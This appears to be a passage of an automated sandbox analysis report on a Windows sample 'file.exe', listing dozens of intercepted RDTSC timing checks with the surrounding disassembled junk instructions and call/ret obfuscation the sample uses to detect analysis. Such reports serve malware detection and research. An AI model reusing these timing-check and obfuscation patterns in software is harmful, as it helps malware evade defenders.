                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13850C5 second address: 13850C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1385226 second address: 138522C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138522C second address: 1385232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13853B7 second address: 13853BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13853BD second address: 13853DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE18h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138863F second address: 1388644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388644 second address: 1388681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jns 00007FFAE905AE22h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388681 second address: 1388685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388685 second address: 138868B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138868B second address: 1201A16 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAE90574C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e sub dword ptr [ebp+122D1C9Bh], eax 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0C35h] 0x0000001b sub dh, 00000007h 0x0000001e sub dword ptr [ebp+122D1814h], ecx 0x00000024 call dword ptr [ebp+122D1926h] 0x0000002a pushad 0x0000002b add dword ptr [ebp+122D18A0h], edi 0x00000031 xor eax, eax 0x00000033 clc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 cmc 0x00000039 mov dword ptr [ebp+122D2AF3h], eax 0x0000003f mov dword ptr [ebp+122D18A0h], eax 0x00000045 mov esi, 0000003Ch 0x0000004a or dword ptr [ebp+122D18A0h], ebx 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 stc 0x00000055 lodsw 0x00000057 stc 0x00000058 add eax, dword ptr [esp+24h] 0x0000005c stc 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jmp 00007FFAE90574D8h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388792 second address: 1388799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388799 second address: 13887EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FFAE90574D5h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 push esi 0x00000017 jmp 00007FFAE90574D0h 0x0000001c pop esi 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push ebx 0x00000021 jmp 00007FFAE90574CAh 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jo 00007FFAE90574C6h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13887EF second address: 13887F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388ABB second address: 1388ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388ABF second address: 1388AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388AC3 second address: 1388B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 51A8F6E5h 0x0000000d mov edx, dword ptr [ebp+122D1E9Ah] 0x00000013 lea ebx, dword ptr [ebp+1245A5A4h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FFAE90574C8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 call 00007FFAE90574CAh 0x00000038 ja 00007FFAE90574CCh 0x0000003e pop edx 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 jl 00007FFAE90574C6h 0x00000049 pop eax 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388B1B second address: 1388B25 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAE905AE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA6A8 second address: 13AA6C4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAE90574C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007FFAE90574C6h 0x00000011 pop eax 0x00000012 jc 00007FFAE90574D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136A93A second address: 136A940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8343 second address: 13A8361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jmp 00007FFAE90574D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8361 second address: 13A837E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007FFAE905AE15h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A837E second address: 13A8386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A850B second address: 13A8511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8511 second address: 13A8535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE90574CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFAE90574CDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8535 second address: 13A853A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A853A second address: 13A8544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFAE90574C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A86BC second address: 13A86D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FFAE905AE16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A86D8 second address: 13A86E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007FFAE90574C6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A883D second address: 13A8841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8841 second address: 13A886C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAE90574D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FFAE90574C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A886C second address: 13A8884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE14h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8884 second address: 13A8891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8B2A second address: 13A8B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FFAE905AE0Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F9A second address: 13A8F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8F9E second address: 13A8FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FFAE905AE13h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A915A second address: 13A9173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE90574D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9173 second address: 13A917B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A93C6 second address: 13A93CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A93CC second address: 13A93DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007FFAE905AE0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9D73 second address: 13A9D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE90574D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9EEE second address: 13A9EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9EF2 second address: 13A9F02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFAE90574C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9F02 second address: 13A9F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA07C second address: 13AA080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA23B second address: 13AA256 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA256 second address: 13AA25B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA25B second address: 13AA278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFAE905AE06h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE905AE10h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA50D second address: 13AA51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jo 00007FFAE90574D6h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA51C second address: 13AA524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136DEC4 second address: 136DECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B76A5 second address: 13B76AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6DFD second address: 13B6E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E01 second address: 13B6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E07 second address: 13B6E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E10 second address: 13B6E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE905AE0Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6E24 second address: 13B6E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAE90574C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7522 second address: 13B7526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B951E second address: 13B9522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9522 second address: 13B9534 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAE905AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9595 second address: 13B95D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 3A13A091h 0x0000000d call 00007FFAE90574D4h 0x00000012 jl 00007FFAE90574D3h 0x00000018 call 00007FFAE90574CCh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f push 72E9155Eh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pop eax 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9B89 second address: 13B9BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FFAE905AE0Ah 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9BAC second address: 13B9BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE90574D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9BC4 second address: 13B9BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA0DA second address: 13BA0DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA0DF second address: 13BA114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFAE905AE08h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 or dword ptr [ebp+122D3882h], edx 0x00000028 nop 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA114 second address: 13BA13B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FFAE8D0C6B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA1D0 second address: 13BA1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA1D4 second address: 13BA1DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA400 second address: 13BA404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA404 second address: 13BA40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA40A second address: 13BA40F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA6AB second address: 13BA6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA6B1 second address: 13BA6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAE8D89396h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB5D3 second address: 13BB5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB5D9 second address: 13BB5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137499A second address: 13749A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13749A2 second address: 13749D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FFAE8D893A5h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007FFAE8D8939Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBE56 second address: 13BBE6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE8D0C6C0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13749D1 second address: 13749EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE8D893A5h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBE6E second address: 13BBE84 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAE8D0C6B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007FFAE8D0C6C4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF30D second address: 13BF31B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFAE8D89396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C085B second address: 13C0861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BFB40 second address: 13BFB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0861 second address: 13C0865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C05EC second address: 13C05F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0865 second address: 13C08EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAE8D0C6C6h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FFAE8D0C6B8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 cld 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FFAE8D0C6B8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 sub dword ptr [ebp+1247CEF9h], ebx 0x0000004c push 00000000h 0x0000004e movsx edi, dx 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jng 00007FFAE8D0C6BCh 0x00000059 jc 00007FFAE8D0C6B8h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 push edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jns 00007FFAE8D0C6B6h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C05F2 second address: 13C060A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007FFAE8D89396h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jbe 00007FFAE8D8939Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C060A second address: 13C0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
